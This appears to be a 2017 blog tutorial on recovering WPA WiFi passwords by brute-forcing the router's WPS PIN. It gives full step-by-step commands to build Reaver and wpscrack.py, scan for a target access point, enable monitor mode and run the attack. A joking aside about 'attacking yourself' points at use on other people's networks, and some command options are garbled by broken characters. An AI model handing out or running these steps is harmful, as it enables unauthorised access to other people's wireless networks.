Wednesday, December 20, 2017

How to Hack WPA WiFi Passwords by Cracking the WPS PIN!

How to Hack WPA WiFi Passwords by Cracking the WPS PIN!


How to Hack WPA WiFi Passwords by Cracking the
WPS PIN!
In this tutorial , lets go over how to use both tools to crack WPS. As
of yet, no router is safe from this attack, and yet none of the vendors
have reacted and released firmware with mitigations in place. Even
disabling WPS still allows this attack on most routers.
Linux Os

REQUIREMENTS
A router at home with WPS
The following programs installed (install by package
name): aircrack-ng, python-pycryptopp, python-scapy,
libpcap-dev


 
 TOOLS
Reaver (support for all routers):- http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

Wpscrack (faster, but only support for major router
brands):- http://dl.dropboxusercontent.com/u/22108808/wpscrack.zip

CRACK WPS
Text in bold is a terminal command.
Follow the guide that corresponds to the tool that you chose to use
below.
1. Unzip Reaver.
unzip reaver-1.3.tar.gz
2. Change to the Reaver directory.
cd reaver-1.3
3. Configure, compile and install the application.
./configure && make && sudo make install
4. Scan for an access point to attack, and copy its MAC address for
later (XX:XX:XX:XX:XX:XX).
sudo iwlist scan wlan0
5. Set your device into monitor mode.
sudo airmon-ng start wlan0
6. Run the tool against an access point.
reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
7. Wait until it finishes.
This tool makes it too easy.

WPSCRACK.PY
1. Make the program an executable.
chmod +x wpscrack.py
2. Scan for an access point to attack, and copy its MAC address for
later (XX:XX:XX:XX:XX:XX).
sudo iwlist scan wlan0
3. Get your MAC address, save it for later.
ip link show wlan0 | awk /ether/ {print $2}
4. Set your device into monitor mode.
sudo airmon-ng start wlan0
5. Attack your AP.
wpscrack.py �iface mon0 �client <your MAC, because
youre attacking yourself, right?> �bssid <AP MAC
address> --ssid <name of your AP> -v
6. Await victory.
Now, lets hope we see a lot of firmware update action going on in the
near future, or else a lot of places are in a whole world of trouble.


visit link download